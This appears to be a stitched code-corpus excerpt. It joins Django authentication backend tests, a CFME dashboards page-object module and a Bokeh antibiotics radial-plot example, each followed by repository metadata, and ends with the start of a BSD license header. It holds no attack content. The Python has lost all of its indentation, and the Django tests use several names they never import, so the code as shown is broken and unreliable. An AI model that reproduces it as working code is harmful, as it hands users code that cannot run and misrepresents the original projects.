from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.hashers import MD5PasswordHasher
from django.contrib.auth.models import AnonymousUser, Group, Permission, User
from django.contrib.auth.tests.custom_user import CustomUser, ExtensionUser
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.http import HttpRequest
from django.test import (
SimpleTestCase, TestCase, modify_settings, override_settings,
)
from .models import CustomPermissionsUser, UUIDUser
class CountingMD5PasswordHasher(MD5PasswordHasher):
"""Hasher that counts how many times it computes a hash."""
calls = 0
def encode(self, *args, **kwargs):
type(self).calls += 1
return super(CountingMD5PasswordHasher, self).encode(*args, **kwargs)
class BaseModelBackendTest(object):
"""
A base class for tests that need to validate the ModelBackend
with different User models. Subclasses should define a class
level UserModel attribute, and a create_users() method to
construct two users for test purposes.
"""
backend = 'django.contrib.auth.backends.ModelBackend'
def setUp(self):
self.patched_settings = modify_settings(
AUTHENTICATION_BACKENDS={'append': self.backend},
)
self.patched_settings.enable()
self.create_users()
def tearDown(self):
self.patched_settings.disable()
# The custom_perms test messes with ContentTypes, which will
# be cached; flush the cache to ensure there are no side effects
# Refs #14975, #14925
ContentType.objects.clear_cache()
def test_has_perm(self):
user = self.UserModel._default_manager.get(pk=self.user.pk)
self.assertEqual(user.has_perm('auth.test'), False)
user.is_staff = True
user.save()
self.assertEqual(user.has_perm('auth.test'), False)
user.is_superuser = True
user.save()
self.assertEqual(user.has_perm('auth.test'), True)
user.is_staff = True
user.is_superuser = True
user.is_active = False
user.save()
self.assertEqual(user.has_perm('auth.test'), False)
def test_custom_perms(self):
user = self.UserModel._default_manager.get(pk=self.user.pk)
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
user.user_permissions.add(perm)
# reloading user to purge the _perm_cache
user = self.UserModel._default_manager.get(pk=self.user.pk)
self.assertEqual(user.get_all_permissions() == {'auth.test'}, True)
self.assertEqual(user.get_group_permissions(), set())
self.assertEqual(user.has_module_perms('Group'), False)
self.assertEqual(user.has_module_perms('auth'), True)
perm = Permission.objects.create(name='test2', content_type=content_type, codename='test2')
user.user_permissions.add(perm)
perm = Permission.objects.create(name='test3', content_type=content_type, codename='test3')
user.user_permissions.add(perm)
user = self.UserModel._default_manager.get(pk=self.user.pk)
self.assertEqual(user.get_all_permissions(), {'auth.test2', 'auth.test', 'auth.test3'})
self.assertEqual(user.has_perm('test'), False)
self.assertEqual(user.has_perm('auth.test'), True)
self.assertEqual(user.has_perms(['auth.test2', 'auth.test3']), True)
perm = Permission.objects.create(name='test_group', content_type=content_type, codename='test_group')
group = Group.objects.create(name='test_group')
group.permissions.add(perm)
user.groups.add(group)
user = self.UserModel._default_manager.get(pk=self.user.pk)
exp = {'auth.test2', 'auth.test', 'auth.test3', 'auth.test_group'}
self.assertEqual(user.get_all_permissions(), exp)
self.assertEqual(user.get_group_permissions(), {'auth.test_group'})
self.assertEqual(user.has_perms(['auth.test3', 'auth.test_group']), True)
user = AnonymousUser()
self.assertEqual(user.has_perm('test'), False)
self.assertEqual(user.has_perms(['auth.test2', 'auth.test3']), False)
def test_has_no_object_perm(self):
"""Regressiontest for #12462"""
user = self.UserModel._default_manager.get(pk=self.user.pk)
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
user.user_permissions.add(perm)
self.assertEqual(user.has_perm('auth.test', 'object'), False)
self.assertEqual(user.get_all_permissions('object'), set())
self.assertEqual(user.has_perm('auth.test'), True)
self.assertEqual(user.get_all_permissions(), {'auth.test'})
def test_anonymous_has_no_permissions(self):
"""
#17903 -- Anonymous users shouldn't have permissions in
ModelBackend.get_(all|user|group)_permissions().
"""
backend = ModelBackend()
user = self.UserModel._default_manager.get(pk=self.user.pk)
content_type = ContentType.objects.get_for_model(Group)
user_perm = Permission.objects.create(name='test', content_type=content_type, codename='test_user')
group_perm = Permission.objects.create(name='test2', content_type=content_type, codename='test_group')
user.user_permissions.add(user_perm)
group = Group.objects.create(name='test_group')
user.groups.add(group)
group.permissions.add(group_perm)
self.assertEqual(backend.get_all_permissions(user), {'auth.test_user', 'auth.test_group'})
self.assertEqual(backend.get_user_permissions(user), {'auth.test_user', 'auth.test_group'})
self.assertEqual(backend.get_group_permissions(user), {'auth.test_group'})
user.is_anonymous = lambda: True
self.assertEqual(backend.get_all_permissions(user), set())
self.assertEqual(backend.get_user_permissions(user), set())
self.assertEqual(backend.get_group_permissions(user), set())
def test_inactive_has_no_permissions(self):
"""
#17903 -- Inactive users shouldn't have permissions in
ModelBackend.get_(all|user|group)_permissions().
"""
backend = ModelBackend()
user = self.UserModel._default_manager.get(pk=self.user.pk)
content_type = ContentType.objects.get_for_model(Group)
user_perm = Permission.objects.create(name='test', content_type=content_type, codename='test_user')
group_perm = Permission.objects.create(name='test2', content_type=content_type, codename='test_group')
user.user_permissions.add(user_perm)
group = Group.objects.create(name='test_group')
user.groups.add(group)
group.permissions.add(group_perm)
self.assertEqual(backend.get_all_permissions(user), {'auth.test_user', 'auth.test_group'})
self.assertEqual(backend.get_user_permissions(user), {'auth.test_user', 'auth.test_group'})
self.assertEqual(backend.get_group_permissions(user), {'auth.test_group'})
user.is_active = False
user.save()
self.assertEqual(backend.get_all_permissions(user), set())
self.assertEqual(backend.get_user_permissions(user), set())
self.assertEqual(backend.get_group_permissions(user), set())
def test_get_all_superuser_permissions(self):
"""A superuser has all permissions. Refs #14795."""
user = self.UserModel._default_manager.get(pk=self.superuser.pk)
self.assertEqual(len(user.get_all_permissions()), len(Permission.objects.all()))
@override_settings(PASSWORD_HASHERS=['auth_tests.test_auth_backends.CountingMD5PasswordHasher'])
def test_authentication_timing(self):
"""Hasher is run once regardless of whether the user exists. Refs #20760."""
# Re-set the password, because this tests overrides PASSWORD_HASHERS
self.user.set_password('test')
self.user.save()
CountingMD5PasswordHasher.calls = 0
username = getattr(self.user, self.UserModel.USERNAME_FIELD)
authenticate(username=username, password='test')
self.assertEqual(CountingMD5PasswordHasher.calls, 1)
CountingMD5PasswordHasher.calls = 0
authenticate(username='no_such_user', password='test')
self.assertEqual(CountingMD5PasswordHasher.calls, 1)
class ModelBackendTest(BaseModelBackendTest, TestCase):
"""
Tests for the ModelBackend using the default User model.
"""
UserModel = User
def create_users(self):
self.user = User.objects.create_user(
username='test',
email='[email protected]',
password='test',
)
self.superuser = User.objects.create_superuser(
username='test2',
email='[email protected]',
password='test',
)
@override_settings(AUTH_USER_MODEL='auth.ExtensionUser')
class ExtensionUserModelBackendTest(BaseModelBackendTest, TestCase):
"""
Tests for the ModelBackend using the custom ExtensionUser model.
This isn't a perfect test, because both the User and ExtensionUser are
synchronized to the database, which wouldn't ordinary happen in
production. As a result, it doesn't catch errors caused by the non-
existence of the User table.
The specific problem is queries on .filter(groups__user) et al, which
makes an implicit assumption that the user model is called 'User'. In
production, the auth.User table won't exist, so the requested join
won't exist either; in testing, the auth.User *does* exist, and
so does the join. However, the join table won't contain any useful
data; for testing, we check that the data we expect actually does exist.
"""
UserModel = ExtensionUser
def create_users(self):
self.user = ExtensionUser._default_manager.create_user(
username='test',
email='[email protected]',
password='test',
date_of_birth=date(2006, 4, 25)
)
self.superuser = ExtensionUser._default_manager.create_superuser(
username='test2',
email='[email protected]',
password='test',
date_of_birth=date(1976, 11, 8)
)
@override_settings(AUTH_USER_MODEL='auth_tests.CustomPermissionsUser')
class CustomPermissionsUserModelBackendTest(BaseModelBackendTest, TestCase):
"""
Tests for the ModelBackend using the CustomPermissionsUser model.
As with the ExtensionUser test, this isn't a perfect test, because both
the User and CustomPermissionsUser are synchronized to the database,
which wouldn't ordinary happen in production.
"""
UserModel = CustomPermissionsUser
def create_users(self):
self.user = CustomPermissionsUser._default_manager.create_user(
email='[email protected]',
password='test',
date_of_birth=date(2006, 4, 25)
)
self.superuser = CustomPermissionsUser._default_manager.create_superuser(
email='[email protected]',
password='test',
date_of_birth=date(1976, 11, 8)
)
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CustomUserModelBackendAuthenticateTest(TestCase):
"""
Tests that the model backend can accept a credentials kwarg labeled with
custom user model's USERNAME_FIELD.
"""
def test_authenticate(self):
test_user = CustomUser._default_manager.create_user(
email='[email protected]',
password='test',
date_of_birth=date(2006, 4, 25)
)
authenticated_user = authenticate(email='[email protected]', password='test')
self.assertEqual(test_user, authenticated_user)
@override_settings(AUTH_USER_MODEL='auth_tests.UUIDUser')
class UUIDUserTests(TestCase):
def test_login(self):
"""
A custom user with a UUID primary key should be able to login.
"""
user = UUIDUser.objects.create_user(username='uuid', password='test')
self.assertTrue(self.client.login(username='uuid', password='test'))
self.assertEqual(UUIDUser.objects.get(pk=self.client.session[SESSION_KEY]), user)
class TestObj(object):
pass
class SimpleRowlevelBackend(object):
def has_perm(self, user, perm, obj=None):
if not obj:
return # We only support row level perms
if isinstance(obj, TestObj):
if user.username == 'test2':
return True
elif user.is_anonymous() and perm == 'anon':
return True
elif not user.is_active and perm == 'inactive':
return True
return False
def has_module_perms(self, user, app_label):
if not user.is_anonymous() and not user.is_active:
return False
return app_label == "app1"
def get_all_permissions(self, user, obj=None):
if not obj:
return [] # We only support row level perms
if not isinstance(obj, TestObj):
return ['none']
if user.is_anonymous():
return ['anon']
if user.username == 'test2':
return ['simple', 'advanced']
else:
return ['simple']
def get_group_permissions(self, user, obj=None):
if not obj:
return # We only support row level perms
if not isinstance(obj, TestObj):
return ['none']
if 'test_group' in [group.name for group in user.groups.all()]:
return ['group_perm']
else:
return ['none']
@modify_settings(AUTHENTICATION_BACKENDS={
'append': 'auth_tests.test_auth_backends.SimpleRowlevelBackend',
})
class RowlevelBackendTest(TestCase):
"""
Tests for auth backend that supports object level permissions
"""
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
self.user2 = User.objects.create_user('test2', '[email protected]', 'test')
self.user3 = User.objects.create_user('test3', '[email protected]', 'test')
def tearDown(self):
# The get_group_permissions test messes with ContentTypes, which will
# be cached; flush the cache to ensure there are no side effects
# Refs #14975, #14925
ContentType.objects.clear_cache()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user2.has_perm('perm', TestObj()), True)
self.assertEqual(self.user2.has_perm('perm'), False)
self.assertEqual(self.user2.has_perms(['simple', 'advanced'], TestObj()), True)
self.assertEqual(self.user3.has_perm('perm', TestObj()), False)
self.assertEqual(self.user3.has_perm('anon', TestObj()), False)
self.assertEqual(self.user3.has_perms(['simple', 'advanced'], TestObj()), False)
def test_get_all_permissions(self):
self.assertEqual(self.user1.get_all_permissions(TestObj()), {'simple'})
self.assertEqual(self.user2.get_all_permissions(TestObj()), {'simple', 'advanced'})
self.assertEqual(self.user2.get_all_permissions(), set())
def test_get_group_permissions(self):
group = Group.objects.create(name='test_group')
self.user3.groups.add(group)
self.assertEqual(self.user3.get_group_permissions(TestObj()), {'group_perm'})
@override_settings(
AUTHENTICATION_BACKENDS=['auth_tests.test_auth_backends.SimpleRowlevelBackend'],
)
class AnonymousUserBackendTest(SimpleTestCase):
"""
Tests for AnonymousUser delegating to backend.
"""
def setUp(self):
self.user1 = AnonymousUser()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user1.has_perm('anon', TestObj()), True)
def test_has_perms(self):
self.assertEqual(self.user1.has_perms(['anon'], TestObj()), True)
self.assertEqual(self.user1.has_perms(['anon', 'perm'], TestObj()), False)
def test_has_module_perms(self):
self.assertEqual(self.user1.has_module_perms("app1"), True)
self.assertEqual(self.user1.has_module_perms("app2"), False)
def test_get_all_permissions(self):
self.assertEqual(self.user1.get_all_permissions(TestObj()), {'anon'})
@override_settings(AUTHENTICATION_BACKENDS=[])
class NoBackendsTest(TestCase):
"""
Tests that an appropriate error is raised if no auth backends are provided.
"""
def setUp(self):
self.user = User.objects.create_user('test', '[email protected]', 'test')
def test_raises_exception(self):
with self.assertRaises(ImproperlyConfigured):
self.user.has_perm(('perm', TestObj()))
@override_settings(AUTHENTICATION_BACKENDS=['auth_tests.test_auth_backends.SimpleRowlevelBackend'])
class InActiveUserBackendTest(TestCase):
"""
Tests for an inactive user
"""
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
self.user1.is_active = False
self.user1.save()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user1.has_perm('inactive', TestObj()), True)
def test_has_module_perms(self):
self.assertEqual(self.user1.has_module_perms("app1"), False)
self.assertEqual(self.user1.has_module_perms("app2"), False)
class PermissionDeniedBackend(object):
"""
Always raises PermissionDenied in `authenticate`, `has_perm` and `has_module_perms`.
"""
def authenticate(self, username=None, password=None):
raise PermissionDenied
def has_perm(self, user_obj, perm, obj=None):
raise PermissionDenied
def has_module_perms(self, user_obj, app_label):
raise PermissionDenied
class PermissionDeniedBackendTest(TestCase):
"""
Tests that other backends are not checked once a backend raises PermissionDenied
"""
backend = 'auth_tests.test_auth_backends.PermissionDeniedBackend'
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
self.user1.save()
@modify_settings(AUTHENTICATION_BACKENDS={'prepend': backend})
def test_permission_denied(self):
"user is not authenticated after a backend raises permission denied #2550"
self.assertEqual(authenticate(username='test', password='test'), None)
@modify_settings(AUTHENTICATION_BACKENDS={'append': backend})
def test_authenticates(self):
self.assertEqual(authenticate(username='test', password='test'), self.user1)
@modify_settings(AUTHENTICATION_BACKENDS={'prepend': backend})
def test_has_perm_denied(self):
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
self.user1.user_permissions.add(perm)
self.assertIs(self.user1.has_perm('auth.test'), False)
self.assertIs(self.user1.has_module_perms('auth'), False)
@modify_settings(AUTHENTICATION_BACKENDS={'append': backend})
def test_has_perm(self):
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
self.user1.user_permissions.add(perm)
self.assertIs(self.user1.has_perm('auth.test'), True)
self.assertIs(self.user1.has_module_perms('auth'), True)
class NewModelBackend(ModelBackend):
pass
class ChangedBackendSettingsTest(TestCase):
"""
Tests for changes in the settings.AUTHENTICATION_BACKENDS
"""
backend = 'auth_tests.test_auth_backends.NewModelBackend'
TEST_USERNAME = 'test_user'
TEST_PASSWORD = 'test_password'
TEST_EMAIL = '[email protected]'
def setUp(self):
User.objects.create_user(self.TEST_USERNAME,
self.TEST_EMAIL,
self.TEST_PASSWORD)
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_changed_backend_settings(self):
"""
Tests that removing a backend configured in AUTHENTICATION_BACKENDS
make already logged-in users disconnect.
"""
# Get a session for the test user
self.assertTrue(self.client.login(
username=self.TEST_USERNAME,
password=self.TEST_PASSWORD)
)
# Prepare a request object
request = HttpRequest()
request.session = self.client.session
# Remove NewModelBackend
with self.settings(AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend']):
# Get the user from the request
user = get_user(request)
# Assert that the user retrieval is successful and the user is
# anonymous as the backend is not longer available.
self.assertIsNotNone(user)
self.assertTrue(user.is_anonymous())
class TypeErrorBackend(object):
"""
Always raises TypeError.
"""
def authenticate(self, username=None, password=None):
raise TypeError
class TypeErrorBackendTest(TestCase):
"""
Tests that a TypeError within a backend is propagated properly.
Regression test for ticket #18171
"""
backend = 'auth_tests.test_auth_backends.TypeErrorBackend'
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_type_error_raised(self):
with self.assertRaises(TypeError):
authenticate(username='test', password='test')
class ImproperlyConfiguredUserModelTest(TestCase):
"""
Tests that an exception from within get_user_model is propagated and doesn't
raise an UnboundLocalError.
Regression test for ticket #21439
"""
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
self.client.login(
username='test',
password='test'
)
@override_settings(AUTH_USER_MODEL='thismodel.doesntexist')
def test_does_not_shadow_exception(self):
# Prepare a request object
request = HttpRequest()
request.session = self.client.session
with self.assertRaises(ImproperlyConfigured):
get_user(request)
class ImportedModelBackend(ModelBackend):
pass
class CustomModelBackend(ModelBackend):
pass
class OtherModelBackend(ModelBackend):
pass
class ImportedBackendTests(TestCase):
"""
#23925 - The backend path added to the session should be the same
as the one defined in AUTHENTICATION_BACKENDS setting.
"""
backend = 'auth_tests.backend_alias.ImportedModelBackend'
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_backend_path(self):
username = 'username'
password = 'password'
User.objects.create_user(username, 'email', password)
self.assertTrue(self.client.login(username=username, password=password))
request = HttpRequest()
request.session = self.client.session
self.assertEqual(request.session[BACKEND_SESSION_KEY], self.backend)
class SelectingBackendTests(TestCase):
backend = 'auth_tests.test_auth_backends.CustomModelBackend'
other_backend = 'auth_tests.test_auth_backends.OtherModelBackend'
username = 'username'
password = 'password'
def assertBackendInSession(self, backend):
request = HttpRequest()
request.session = self.client.session
self.assertEqual(request.session[BACKEND_SESSION_KEY], backend)
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_backend_path_login_without_authenticate_single_backend(self):
user = User.objects.create_user(self.username, 'email', self.password)
self.client._login(user)
self.assertBackendInSession(self.backend)
@override_settings(AUTHENTICATION_BACKENDS=[backend, other_backend])
def test_backend_path_login_without_authenticate_multiple_backends(self):
user = User.objects.create_user(self.username, 'email', self.password)
expected_message = (
'You have multiple authentication backends configured and '
'therefore must provide the `backend` argument or set the '
'`backend` attribute on the user.'
)
with self.assertRaisesMessage(ValueError, expected_message):
self.client._login(user)
@override_settings(AUTHENTICATION_BACKENDS=[backend, other_backend])
def test_backend_path_login_with_explicit_backends(self):
user = User.objects.create_user(self.username, 'email', self.password)
self.client._login(user, self.other_backend)
self.assertBackendInSession(self.other_backend)
|
varunnaganathan/django
|
tests/auth_tests/test_auth_backends.py
|
Python
|
bsd-3-clause
| 25,359 | 0.001814 |
# -*- coding: utf-8 -*-
"""Page model for Cloud Intel / Reports / Dashboards"""
from navmazing import NavigateToAttribute, NavigateToSibling
from widgetastic.widget import Text, Checkbox
from widgetastic_manageiq import SummaryFormItem, DashboardWidgetsPicker
from widgetastic_patternfly import Button, Input
from utils.appliance import Navigatable
from utils.appliance.implementations.ui import navigator, CFMENavigateStep, navigate_to
from utils.pretty import Pretty
from utils.update import Updateable
from . import CloudIntelReportsView
class DashboardAllGroupsView(CloudIntelReportsView):
title = Text("#explorer_title_text")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboards for "{}"'.format(self.context["object"].group) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group
]
)
class DashboardFormCommon(CloudIntelReportsView):
title = Text("#explorer_title_text")
basic_information = Text(".//div[@id='form_div']/h3")
name = Input(name="name")
tab_title = Input(name="description")
locked = Checkbox("locked")
sample_dashboard = Text(".//div[@id='form_widgets_div']/h3")
widgets = DashboardWidgetsPicker(
"form_widgets_div",
select_id="widget",
names_locator=".//a[starts-with(@id, 'w_')]/..",
remove_locator=".//div[contains(@title, {})]//a/i"
)
cancel_button = Button("Cancel")
class NewDashboardView(DashboardFormCommon):
add_button = Button("Add")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Adding a new dashboard" and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group
]
)
class EditDashboardView(DashboardFormCommon):
save_button = Button("Save")
reset_button = Button("Reset")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Editing Dashboard {}".format(self.context["object"].name) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group,
self.context["object"].name
]
)
class EditDefaultDashboardView(EditDashboardView):
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Editing Dashboard {}".format(self.context["object"].name) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"{} ({})".format(self.context["object"].title, self.context["object"].name)
]
)
class DashboardDetailsView(CloudIntelReportsView):
SAMPLE_DASHBOARD_ROOT = ".//div[@id='modules']"
ITEM_TITLE_LOCATOR = ".//h3[contains(@class, 'panel-title')]"
title = Text("#explorer_title_text")
name = SummaryFormItem("Basic Information", "Name")
tab_title = SummaryFormItem("Basic Information", "Tab Title")
@property
def selected_items(self):
items = []
for el in self.browser.elements(self.ITEM_TITLE_LOCATOR, self.SAMPLE_DASHBOARD_ROOT):
items.append(self.browser.text(el))
return items
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboard "{} ({})"'.format(
self.context["object"].title,
self.context["object"].name
) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group,
self.context["object"].name
]
)
class DefaultDashboardDetailsView(DashboardDetailsView):
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboard "{} ({})"'.format(
self.context["object"].title,
self.context["object"].name
) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"{} ({})".format(self.context["object"].title, self.context["object"].name)
]
)
class Dashboard(Updateable, Pretty, Navigatable):
pretty_attrs = ["name", "group", "title", "widgets"]
def __init__(self, name, group, title=None, locked=None, widgets=None, appliance=None):
Navigatable.__init__(self, appliance)
self.name = name
self.title = title
self.locked = locked
self.widgets = widgets
self._group = group
@property
def group(self):
return self._group
def create(self, cancel=False):
"""Create this Dashboard in the UI."""
view = navigate_to(self, "Add")
view.fill({
"name": self.name,
"tab_title": self.title,
"locked": self.locked,
"widgets": self.widgets
})
view.add_button.click()
view = self.create_view(DashboardAllGroupsView)
assert view.is_displayed
view.flash.assert_no_error()
view.flash.assert_message('Dashboard "{}" was saved'.format(self.name))
def update(self, updates):
"""Update this Dashboard in the UI.
Args:
updates: Provided by update() context manager.
"""
view = navigate_to(self, "Edit")
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
for attr, value in updates.items():
setattr(self, attr, value)
view = self.create_view(DashboardDetailsView)
assert view.is_displayed
view.flash.assert_no_error()
if changed:
view.flash.assert_message('Dashboard "{}" was saved'.format(self.name))
else:
view.flash.assert_message(
'Edit of Dashboard "{}" was cancelled by the user'.format(self.name))
def delete(self, cancel=False):
"""Delete this Dashboard in the UI.
Args:
cancel: Whether to cancel the deletion (default False).
"""
view = navigate_to(self, "Details")
view.configuration.item_select(
"Delete this Dashboard from the Database",
handle_alert=not cancel
)
if cancel:
assert view.is_displayed
view.flash.assert_no_error()
else:
view = self.create_view(DashboardAllGroupsView)
assert view.is_displayed
view.flash.assert_no_error()
class DefaultDashboard(Updateable, Pretty, Navigatable):
pretty_attrs = ["name", "title", "widgets"]
def __init__(self, title="Default Dashboard", locked=None, widgets=None, appliance=None):
Navigatable.__init__(self, appliance)
self.title = title
self.locked = locked
self.widgets = widgets
@property
def name(self):
"""Name of Default Dashboard cannot be changed."""
return "default"
def update(self, updates):
"""Update Default Dashboard in the UI.
Args:
updates: Provided by update() context manager.
"""
view = navigate_to(self, "Edit")
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
view = self.create_view(DefaultDashboardDetailsView)
assert view.is_displayed
if changed:
view.flash.assert_success_message('Dashboard "{}" was saved'.format(self.name))
else:
view.flash.assert_success_message(
'Edit of Dashboard "{}" was cancelled by the user'.format(self.name))
@navigator.register(Dashboard, "Add")
class DashboardNew(CFMENavigateStep):
VIEW = NewDashboardView
prerequisite = NavigateToAttribute("appliance.server", "CloudIntelReports")
def step(self):
self.prerequisite_view.dashboards.tree.click_path(
"All Dashboards",
"All Groups",
self.obj.group
)
self.prerequisite_view.configuration.item_select("Add a new Dashboard")
@navigator.register(Dashboard, "Edit")
class DashboardEdit(CFMENavigateStep):
VIEW = EditDashboardView
prerequisite = NavigateToSibling("Details")
def step(self):
self.prerequisite_view.configuration.item_select("Edit this Dashboard")
@navigator.register(DefaultDashboard, "Edit")
class DefaultDashboardEdit(CFMENavigateStep):
VIEW = EditDefaultDashboardView
prerequisite = NavigateToSibling("Details")
def step(self):
self.prerequisite_view.configuration.item_select("Edit this Dashboard")
@navigator.register(Dashboard, "Details")
class DashboardDetails(CFMENavigateStep):
VIEW = DashboardDetailsView
prerequisite = NavigateToAttribute("appliance.server", "CloudIntelReports")
def step(self):
self.prerequisite_view.dashboards.tree.click_path(
"All Dashboards",
"All Groups",
self.obj.group,
self.obj.name
)
@navigator.register(DefaultDashboard, "Details")
class DefaultDashboardDetails(CFMENavigateStep):
VIEW = DefaultDashboardDetailsView
prerequisite = NavigateToAttribute("appliance.server", "CloudIntelReports")
def step(self):
self.prerequisite_view.dashboards.tree.click_path(
"All Dashboards",
"{} ({})".format(self.obj.title, self.obj.name)
)
|
dajohnso/cfme_tests
|
cfme/intelligence/reports/dashboards.py
|
Python
|
gpl-2.0
| 10,188 | 0.001276 |
# The plot server must be running
# Go to http://localhost:5006/bokeh to view this plot
from collections import OrderedDict
from math import log, sqrt
import numpy as np
import pandas as pd
from six.moves import cStringIO as StringIO
from bokeh.plotting import figure, show, output_server
antibiotics = """
bacteria, penicillin, streptomycin, neomycin, gram
Mycobacterium tuberculosis, 800, 5, 2, negative
Salmonella schottmuelleri, 10, 0.8, 0.09, negative
Proteus vulgaris, 3, 0.1, 0.1, negative
Klebsiella pneumoniae, 850, 1.2, 1, negative
Brucella abortus, 1, 2, 0.02, negative
Pseudomonas aeruginosa, 850, 2, 0.4, negative
Escherichia coli, 100, 0.4, 0.1, negative
Salmonella (Eberthella) typhosa, 1, 0.4, 0.008, negative
Aerobacter aerogenes, 870, 1, 1.6, negative
Brucella antracis, 0.001, 0.01, 0.007, positive
Streptococcus fecalis, 1, 1, 0.1, positive
Staphylococcus aureus, 0.03, 0.03, 0.001, positive
Staphylococcus albus, 0.007, 0.1, 0.001, positive
Streptococcus hemolyticus, 0.001, 14, 10, positive
Streptococcus viridans, 0.005, 10, 40, positive
Diplococcus pneumoniae, 0.005, 11, 10, positive
"""
drug_color = OrderedDict([
("Penicillin", "#0d3362"),
("Streptomycin", "#c64737"),
("Neomycin", "black" ),
])
gram_color = {
"positive" : "#aeaeb8",
"negative" : "#e69584",
}
df = pd.read_csv(StringIO(antibiotics),
skiprows=1,
skipinitialspace=True,
engine='python')
width = 800
height = 800
inner_radius = 90
outer_radius = 300 - 10
minr = sqrt(log(.001 * 1E4))
maxr = sqrt(log(1000 * 1E4))
a = (outer_radius - inner_radius) / (minr - maxr)
b = inner_radius - a * maxr
def rad(mic):
return a * np.sqrt(np.log(mic * 1E4)) + b
big_angle = 2.0 * np.pi / (len(df) + 1)
small_angle = big_angle / 7
x = np.zeros(len(df))
y = np.zeros(len(df))
output_server("burtin")
p = figure(plot_width=width, plot_height=height, title="",
x_axis_type=None, y_axis_type=None,
x_range=[-420, 420], y_range=[-420, 420],
min_border=0, outline_line_color="black",
background_fill="#f0e1d2", border_fill="#f0e1d2")
p.line(x+1, y+1, alpha=0)
# annular wedges
angles = np.pi/2 - big_angle/2 - df.index.to_series()*big_angle
colors = [gram_color[gram] for gram in df.gram]
p.annular_wedge(
x, y, inner_radius, outer_radius, -big_angle+angles, angles, color=colors,
)
# small wedges
p.annular_wedge(x, y, inner_radius, rad(df.penicillin),
-big_angle+angles+5*small_angle, -big_angle+angles+6*small_angle,
color=drug_color['Penicillin'])
p.annular_wedge(x, y, inner_radius, rad(df.streptomycin),
-big_angle+angles+3*small_angle, -big_angle+angles+4*small_angle,
color=drug_color['Streptomycin'])
p.annular_wedge(x, y, inner_radius, rad(df.neomycin),
-big_angle+angles+1*small_angle, -big_angle+angles+2*small_angle,
color=drug_color['Neomycin'])
# circular axes and lables
labels = np.power(10.0, np.arange(-3, 4))
radii = a * np.sqrt(np.log(labels * 1E4)) + b
p.circle(x, y, radius=radii, fill_color=None, line_color="white")
p.text(x[:-1], radii[:-1], [str(r) for r in labels[:-1]],
text_font_size="8pt", text_align="center", text_baseline="middle")
# radial axes
p.annular_wedge(x, y, inner_radius-10, outer_radius+10,
-big_angle+angles, -big_angle+angles, color="black")
# bacteria labels
xr = radii[0]*np.cos(np.array(-big_angle/2 + angles))
yr = radii[0]*np.sin(np.array(-big_angle/2 + angles))
label_angle=np.array(-big_angle/2+angles)
label_angle[label_angle < -np.pi/2] += np.pi # easier to read labels on the left side
p.text(xr, yr, df.bacteria, angle=label_angle,
text_font_size="9pt", text_align="center", text_baseline="middle")
# OK, these hand drawn legends are pretty clunky, will be improved in future release
p.circle([-40, -40], [-370, -390], color=list(gram_color.values()), radius=5)
p.text([-30, -30], [-370, -390], text=["Gram-" + gr for gr in gram_color.keys()],
text_font_size="7pt", text_align="left", text_baseline="middle")
p.rect([-40, -40, -40], [18, 0, -18], width=30, height=13,
color=list(drug_color.values()))
p.text([-15, -15, -15], [18, 0, -18], text=list(drug_color.keys()),
text_font_size="9pt", text_align="left", text_baseline="middle")
p.xgrid.grid_line_color = None
p.ygrid.grid_line_color = None
show(p)
|
akloster/bokeh
|
examples/plotting/server/burtin.py
|
Python
|
bsd-3-clause
| 4,826 | 0.005387 |
#!/usr/bin/env python
#
# Copyright (c) 2009, Roboterclub Aachen e.V.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Roboterclub Aachen e.V. nor the
# names of its contributors may be used to endorse or promote products
